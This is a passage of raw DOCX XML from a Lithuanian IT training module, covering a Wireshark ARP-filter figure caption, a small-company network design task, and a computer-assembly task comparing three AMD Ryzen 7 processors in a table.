                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId283">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="1186180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDDC14B" w14:textId="5D62C821" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">20 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras ARP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D434C" w14:textId="051A6CE8" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="33D0628F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: Zykas A. (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D5F7E2" w14:textId="051A6CE8" w:rsidR="00B33BD2" w:rsidRPr="005A5C28" w:rsidRDefault="00B33BD2" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE45283" w14:textId="77777777" w:rsidR="00ED6F79" w:rsidRPr="005A5C28" w:rsidRDefault="00ED6F79" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">19 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NEDELĖS ĮMONĖS TINKLO SUDARYMAS. TINKLO PROJEKTAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019B0328" w14:textId="5247108B" w:rsidR="00DC0673" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMA</w:t>
      </w:r>
      <w:r w:rsidR="00EB6323" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DCD27E" w14:textId="7707B913" w:rsidR="00B33BD2" w:rsidRPr="005A5C28" w:rsidRDefault="00B33BD2"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Projektas. Tai planuojamas, kuriamas objektas, pagal duotas pirmin</w:t>
      </w:r>
      <w:r w:rsidR="00ED6F79" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s charakteristikas. Kiekvieno atsakymas individualus ir remiasi asmenine patirtimi, žiniomis, supratimu, gebėjimais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB9D42" w14:textId="77777777" w:rsidR="003B7F5A" w:rsidRPr="005A5C28" w:rsidRDefault="00D36338" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4629C21A" w14:textId="61416662" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Kompiuterių surinkimas“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D477AFD" w14:textId="407DEAC1" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04619DA3" w14:textId="77777777" w:rsidR="00ED6F79" w:rsidRPr="005A5C28" w:rsidRDefault="00ED6F79" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PALYGINTI TRIJŲ KARTŲ PROCESORIUS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F66D59" w14:textId="4B282E8D" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00F42309" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FA0D6D" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0B8F9" w14:textId="743FF72A" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>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477"/>
        <w:gridCol w:w="2479"/>
        <w:gridCol w:w="2485"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3D6F28C4" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6AC5BE47" w14:textId="7AE9D4D1" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Procesoriaus modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="22542A33" w14:textId="3FAE66EA" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD RYZEN 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B22304B" w14:textId="7A4278CC" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3800XT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4FCBFBED" w14:textId="43C1ADAB" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD RYZEN 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1A0FDA" w14:textId="4630DCDD" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5800XT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="063EB34F" w14:textId="39DFF6C0" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD RYZEN 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39AD2DBE" w14:textId="5F196D4F" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2700X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4F0A359C" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="454A9AEA" w14:textId="2E215920" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Technologija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E6A4E1D" w14:textId="570013DA" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>TSMC 7nm FinFET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="447C9D62" w14:textId="5BF0816E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>TSMC 7nm FinFET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDAAA4E" w14:textId="00AFC70E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>TSMC 12nm FinFET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="353A948F" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="19D99C3B" w14:textId="15A04C42" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Architektūra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E84853D" w14:textId="0F84BE97" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Zen2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DDC6700" w14:textId="1C4DC30B" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Zen 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4060779E" w14:textId="22A60486" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Zen+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3A2BC480" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1C6370E8" w14:textId="7669AC1E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Lizdas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0071E244" w14:textId="33873DD8" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AM4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61FF41C4" w14:textId="5094EA1C" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AM4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A5805B3" w14:textId="560847C5" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AM4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2DAB4546" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="652B0B04" w14:textId="33C1C6A4" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Branduolių/gijų</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F937491" w14:textId="7B42EAD4" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102450D4" w14:textId="2774E54D" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249D826C" w14:textId="16B62829" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
